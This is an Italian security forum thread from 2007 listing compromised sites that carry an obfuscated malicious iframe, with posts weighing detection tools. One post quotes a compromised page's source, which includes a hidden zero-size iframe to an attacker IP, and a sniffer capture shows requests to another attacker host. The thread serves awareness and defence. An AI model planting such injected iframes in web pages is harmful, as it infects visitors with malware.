lista domini hackerati su server italiano hosting solutions

mausap · 26-07-2007, 15:55

questa è una lista di domini su ip 194.242.61.210 con un javascript offuscato
contente un iframe malevolo

hxxp://www.24net.it
hxxp://www.affittiinsardegna.it
hxxp://www.aissa.it
hxxp://www.brosmanifatture.it
hxxp://www.caprillina.it
hxxp://www.cdm-dellamura.it
hxxp://www.chiesadicristoroma.it
hxxp://www.cmdm.it
hxxp://www.comitatomadeinitaly.it
hxxp://www.conventionplanning.it
hxxp://www.crvo.it
hxxp://www.dodibattaglia.it
hxxp://www.euroufficio.org
hxxp://www.ffuture.it
hxxp://www.fitvillage.net
hxxp://www.gierre-group.it
hxxp://www.giuditta-countryhouse.it
hxxp://www.hotelriomarina.it
hxxp://www.hotels-hostels-florence.com
hxxp://www.leonberger.it
hxxp://www.man-group.it
hxxp://www.misericordia.firenze.it
hxxp://www.noleggioitalia.it
hxxp://www.ocabianca.com
hxxp://www.pii-cinisello-balsamo.it
hxxp://www.rudolf-keller.it
hxxp://www.scenarionline.it
hxxp://www.tsunami-3d.com
hxxp://www.vespaclubmilano.it

lancetta · 26-07-2007, 16:00

Grande Mausap..solo una cosa edita i link non vorrei che qualcuno cliccasse.....

mausap · 26-07-2007, 16:04

Quote:

Originariamente inviato da lancetta

Grande Mausap..solo una cosa edita i link non vorrei che qualcuno cliccasse.....

Hai ragione mi sono sbagliato e non sono riuscito a correggere l'errore al volo si è impuntato il pc. Scusa

lancetta · 26-07-2007, 16:08

Quote:

Originariamente inviato da mausap

Hai ragione mi sono sbagliato e non sono riuscito a correggere l'errore al volo si è impuntato il pc. Scusa

No no ma figurati..ancora grazie del lavoro che metti a disposizione della comunità

Saluti

xcdegasp · 26-07-2007, 16:25

Quote:

Originariamente inviato da deepdark

Ma se avessi opera con il java attivato prenderei i virus?

è la javascript che teli fa scaricare ed eseguire

@ mausap: mitico!

xcdegasp · 26-07-2007, 16:45

Quote:

Originariamente inviato da deepdark

Con firefox uso noscript ma con opera è possibile fare una cosa simile o devo escludere tutti i siti e poi manmano aggiungere quelli che hanno il permesso di attivarli?

opera ha il sistema simile a noscript integrato.

pcì · 26-07-2007, 17:03

volevo testare explorer ma niente
sembra non siano più hackerati

mausap · 26-07-2007, 17:56

Quote:

Originariamente inviato da pcì

volevo testare explorer ma niente
sembra non siano più hackerati

l siti restano hackerati. Forse l'exploit in russia non è attivo
. Ma l'ip è uno di quelli appartente a un blocco infame.
Basta un attimo per farlo funzionare di nuovo. Il problema sono i siti sul server di hosting solutions

lucas84 · 26-07-2007, 18:13

se analizzi i vari siti con uno sniffer vedrai che per ogni sito postato da lui, restituisce l'errore
GET /stat1/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www. comitatomadeinitaly.it/
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 81.95.148.42
HTTP/1.1 403 Forbidden

Come ha già detto mauro per adesso non sono attivi

Ciao

xcdegasp · 26-07-2007, 18:19

Comunque neppure io capisco perchè i siti non vengano ripuliti da questo codice malevolo..
come esempio carmen consoli che possiede ancora questo codice sorgente:

Quote:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<frameset rows="27,*" framespacing="0" frameborder="no" border="0" >
<frame src="topbar.htm" frameborder="no" marginheight="0" marginwidth="0" scrolling="no" noresize>
<frame src="default.aspx" name="center" frameborder="no" marginheight="0" marginwidth="0" scrolling="auto" noresize>>
</frameset>
<noframes></noframes>
<iframe src='hxxp://81.29.241.236/acc2/anna/index.php?id=111' height='0' width='0' scrolling='no' frameborder='no'></iframe>

mausap · 27-07-2007, 12:16

------------------------------------
vvv.tuttoperlaricevitoria.it
------------------------------------
Num. 1 SITES at IP 194.242.61.20
===================================
vvv.ipocriti.com
vvv.kfactor.it
vvv.hotellombardia.com
vvv.eosmilano.com
vvv.ilmarchiodelleidee.com
vvv.alecampi.it
vvv.altatensioneitalia.com
vvv.valuesearch.it
vvv.fabiosironi.com
vvv.eufootballuniversity.com
vvv.gibilogic.com
vvv.florisitalia.com
vvv.mouillettes-and-co.com
vvv.piccolomarte.it
vvv.metaorizzonte.it
vvv.gshosting.it
vvv.scienzaesocieta.org
vvv.sailingproject.org
vvv.exentiaparma.com
vvv.exentiaparma.com
vvv.dreo.it
vvv.nuovoteatro.com
--------------------------------------
Num. 22 SITES at IP 194.242.61.121
======================================
vvv.simoe.it
vvv.b2comunicazione.com
vvv.laserlisi.net
vvv.bagatti.it
vvv.antonuccirestauri.it
vvv.sportplanetbovalino.com
------------------------------------
Num. 6 SITES at IP 194.242.61.122
====================================
vvv.giacin.com
-----------------------------------
Num. 1 SITES at IP 194.242.61.123
===================================
vvv.bohumil.it
vvv.cosimobuccolieri.com
vvv.systemflight.it
vvv.cregut.it
vvv.turin-gallery.com
vvv.obiettivorisarcimento.it
vvv.zaiti.com
vvv.spinoneitaliano.it
vvv.barlettapianoforti.it
vvv.studiozulian.it
vvv.ceispt.org
-------------------------------------
Num. 11 SITES at IP 194.242.61.128
====================================

xcdegasp · 27-07-2007, 12:24

Sto sperimentando la toolbar di Finjan per Firefox e devo dire che è una potenza...
Non capisco se rileva in automatico la pericolosità in un sito o se è grazie alla segnalazione di qualcuno, ad ogni modo segnala correttamente la presenza di "Code obfuscation"..
La pagina con i dettagli della segnalazione:

Codice:

http://www.finjan.com/Content.aspx?id=1190&url=http%3A%2F%2Fwww.exentiaparma.com%2F&state=unsafe&category=Other&reason=Potentially%20malicious%20behavior%20was%20detected%20on%20this%20page%3A%20Code%20obfuscation%20(home-encoding)%20&more=

mausap · 27-07-2007, 12:48

Quote:

Originariamente inviato da xcdegasp

Sto sperimentando la toolbar di Finjan per Firefox e devo dire che è una potenza...
Non capisco se rileva in automatico la pericolosità in un sito o se è grazie alla segnalazione di qualcuno, ad ogni modo segnala correttamente la presenza di "Code obfuscation"..
La pagina con i dettagli della segnalazione:
http://www.finjan.com/Content.aspx?i...ding)%20&more=

Ottimo le do una occhiata.

E leggetevi il mio blog altrimenti mi arrabbio

juninho85 · 27-07-2007, 12:50

Quote:

Originariamente inviato da xcdegasp

Sto sperimentando la toolbar di Finjan per Firefox e devo dire che è una potenza...
Non capisco se rileva in automatico la pericolosità in un sito o se è grazie alla segnalazione di qualcuno, ad ogni modo segnala correttamente la presenza di "Code obfuscation"..
La pagina con i dettagli della segnalazione:
http://www.finjan.com/Content.aspx?i...ding)%20&more=

mi sa che il link è sbagliato

c.m.g · 27-07-2007, 12:51

bravo mausap, ti meriti un'applauso

se non lo leggete mi arrabbio pure io!

@mausap:

come mai hai tolto il link al tuo blog dalla tua firma?

**Chill-Out** · 27-07-2007, 12:57

Quote:

Originariamente inviato da xcdegasp

Sto sperimentando la toolbar di Finjan per Firefox e devo dire che è una potenza...
Non capisco se rileva in automatico la pericolosità in un sito o se è grazie alla segnalazione di qualcuno, ad ogni modo segnala correttamente la presenza di "Code obfuscation"..
La pagina con i dettagli della segnalazione:
http://www.finjan.com/Content.aspx?i...ding)%20&more=

Grande segnalazione, quoto è un portento.

URL Analysis online: http://www.finjan.com/Content.aspx?id=574

mausap · 27-07-2007, 13:27

Quote:

Originariamente inviato da c.m.g

bravo mausap, ti meriti un'applauso

se non lo leggete mi arrabbio pure io!

@mausap:

come mai hai tolto il link al tuo blog dalla tua firma?

Non lo vedi? A me sembra che ci sia ancora. Ho controllato anche nel profilo

c.m.g · 27-07-2007, 13:31

mea culpa. avevo disabilitato le firme nelle opzioni del mio pannello di controllo del forum

xcdegasp · 27-07-2007, 13:41

Quote:

Originariamente inviato da juninho85

mi sa che il link è sbagliato

vedi ora, te l'ho incapsulato nel tag code

mausap · 27-07-2007, 14:29

A proposito della barra finjan

Si puo' usare ma attenzione fatelo con l'opzione "mostra solo i siti pericolosi (rossi)"

SPESSO INDICA COME VERDI E QUINDI SICURI SITI PERICOLOSI (siti che puntano a inhoster - ucraina )

Poi indica il sito di carmen consoli come sicuro
adesso c'è ancora l'iframe

Non affidabile purtroppo.

26-07-2007, 15:55	#1
mausap Senior Member Iscritto dal: Jan 2007 Messaggi: 308	lista domini hackerati su server italiano hosting solutions questa è una lista di domini su ip 194.242.61.210 con un javascript offuscato contente un iframe malevolo hxxp://www.24net.it hxxp://www.affittiinsardegna.it hxxp://www.aissa.it hxxp://www.brosmanifatture.it hxxp://www.caprillina.it hxxp://www.cdm-dellamura.it hxxp://www.chiesadicristoroma.it hxxp://www.cmdm.it hxxp://www.comitatomadeinitaly.it hxxp://www.conventionplanning.it hxxp://www.crvo.it hxxp://www.dodibattaglia.it hxxp://www.euroufficio.org hxxp://www.ffuture.it hxxp://www.fitvillage.net hxxp://www.gierre-group.it hxxp://www.giuditta-countryhouse.it hxxp://www.hotelriomarina.it hxxp://www.hotels-hostels-florence.com hxxp://www.leonberger.it hxxp://www.man-group.it hxxp://www.misericordia.firenze.it hxxp://www.noleggioitalia.it hxxp://www.ocabianca.com hxxp://www.pii-cinisello-balsamo.it hxxp://www.rudolf-keller.it hxxp://www.scenarionline.it hxxp://www.tsunami-3d.com hxxp://www.vespaclubmilano.it __________________ maipiugromozon.blogspot.com Ultima modifica di mausap : 26-07-2007 alle 16:04.

26-07-2007, 16:00	#2
lancetta Senior Member Iscritto dal: Feb 2007 Città: Salerno...... Messaggi: 3259	Grande Mausap..solo una cosa edita i link non vorrei che qualcuno cliccasse..... __________________ Opera disabilitazione script ed iframe Recuperare le proprie password on line. Messenger: massima attenzione ai SITI TRUFFA \| GUIDA:ShutdownTimer (Spegnimento auto pc) \| Quando il centro sicurezza non riconosce i soft. Guida a Malwarebytes' Anti-Malware = tiemp bell e na volta...

26-07-2007, 18:13	#9
lucas84 Senior Member Iscritto dal: Aug 2005 Messaggi: 1267	se analizzi i vari siti con uno sniffer vedrai che per ogni sito postato da lui, restituisce l'errore GET /stat1/index.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Referer: http://www. comitatomadeinitaly.it/ Accept-Language: it Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: 81.95.148.42 HTTP/1.1 403 Forbidden Come ha già detto mauro per adesso non sono attivi Ciao __________________ Il dubbio è il padre del sapere.

27-07-2007, 12:16	#11
mausap Senior Member Iscritto dal: Jan 2007 Messaggi: 308	Altri siti legittimi hackerati sempre su Hosting Solutions ------------------------------------ vvv.tuttoperlaricevitoria.it ------------------------------------ Num. 1 SITES at IP 194.242.61.20 =================================== vvv.ipocriti.com vvv.kfactor.it vvv.hotellombardia.com vvv.eosmilano.com vvv.ilmarchiodelleidee.com vvv.alecampi.it vvv.altatensioneitalia.com vvv.valuesearch.it vvv.fabiosironi.com vvv.eufootballuniversity.com vvv.gibilogic.com vvv.florisitalia.com vvv.mouillettes-and-co.com vvv.piccolomarte.it vvv.metaorizzonte.it vvv.gshosting.it vvv.scienzaesocieta.org vvv.sailingproject.org vvv.exentiaparma.com vvv.exentiaparma.com vvv.dreo.it vvv.nuovoteatro.com -------------------------------------- Num. 22 SITES at IP 194.242.61.121 ====================================== vvv.simoe.it vvv.b2comunicazione.com vvv.laserlisi.net vvv.bagatti.it vvv.antonuccirestauri.it vvv.sportplanetbovalino.com ------------------------------------ Num. 6 SITES at IP 194.242.61.122 ==================================== vvv.giacin.com ----------------------------------- Num. 1 SITES at IP 194.242.61.123 =================================== vvv.bohumil.it vvv.cosimobuccolieri.com vvv.systemflight.it vvv.cregut.it vvv.turin-gallery.com vvv.obiettivorisarcimento.it vvv.zaiti.com vvv.spinoneitaliano.it vvv.barlettapianoforti.it vvv.studiozulian.it vvv.ceispt.org ------------------------------------- Num. 11 SITES at IP 194.242.61.128 ==================================== __________________ maipiugromozon.blogspot.com

27-07-2007, 12:24	#12
xcdegasp Senior Member Iscritto dal: Nov 2001 Città: Fidenza(pr) da Trento Messaggi: 27479	Sto sperimentando la toolbar di Finjan per Firefox e devo dire che è una potenza... Non capisco se rileva in automatico la pericolosità in un sito o se è grazie alla segnalazione di qualcuno, ad ogni modo segnala correttamente la presenza di "Code obfuscation".. La pagina con i dettagli della segnalazione: Codice: http://www.finjan.com/Content.aspx?id=1190&url=http%3A%2F%2Fwww.exentiaparma.com%2F&state=unsafe&category=Other&reason=Potentially%20malicious%20behavior%20was%20detected%20on%20this%20page%3A%20Code%20obfuscation%20(home-encoding)%20&more= __________________ "Visti da vicino siamo tutti strani..." ~\|~ What Defines a Community? ~\|~ Thread eMule Ufficiale ~\|~ Online Armor in Italiano ~\|~ Regole di Sezione ~\|► Guida a PrivateFirewall quinto potere ~\|~ Le illusioni della TV Ultima modifica di xcdegasp : 27-07-2007 alle 13:41.

26-07-2007, 17:03	#7
pcì Registered User Iscritto dal: May 2007 Messaggi: 64	volevo testare explorer ma niente sembra non siano più hackerati

27-07-2007, 12:51	#15
c.m.g Senior Member Iscritto dal: Mar 2006 Messaggi: 22121	bravo mausap, ti meriti un'applauso se non lo leggete mi arrabbio pure io! @mausap: come mai hai tolto il link al tuo blog dalla tua firma?

27-07-2007, 13:31	#18
c.m.g Senior Member Iscritto dal: Mar 2006 Messaggi: 22121	mea culpa. avevo disabilitato le firme nelle opzioni del mio pannello di controllo del forum

27-07-2007, 14:29	#20
mausap Senior Member Iscritto dal: Jan 2007 Messaggi: 308	A proposito della barra finjan Si puo' usare ma attenzione fatelo con l'opzione "mostra solo i siti pericolosi (rossi)" SPESSO INDICA COME VERDI E QUINDI SICURI SITI PERICOLOSI (siti che puntano a inhoster - ucraina ) Poi indica il sito di carmen consoli come sicuro adesso c'è ancora l'iframe Non affidabile purtroppo. __________________ maipiugromozon.blogspot.com Ultima modifica di mausap : 27-07-2007 alle 14:35.

Strumenti
Mostra una versione stampabile Invia questa pagina per email